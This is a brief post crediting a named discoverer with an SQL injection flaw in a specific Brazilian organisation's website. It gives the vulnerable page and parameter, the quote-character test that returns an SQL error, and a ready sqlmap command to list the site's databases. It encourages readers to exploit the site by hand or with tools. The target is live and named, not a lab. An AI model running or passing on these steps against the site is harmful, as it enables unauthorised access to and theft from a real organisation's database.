Hey what's up?
Website : ritmosdocoracao.org.br
Vulnerability : SQL Injection
Discovered by @uromulou
1 . Go to https://ritmosdocoracao.org.br/detalhe-projeto.php?Id=8
2 . Test SQL Injection, https://ritmosdocoracao.org.br/detalhe-projeto.php?Id=8'
3 . It is return SQL error
4 . To exploit, with tools such as sqlmap or others, or if you know, attack with your hands!
Example with sqlmap : sqlmap --url https://ritmosdocoracao.org.br/detalhe-projeto.php?Id=8 --dbs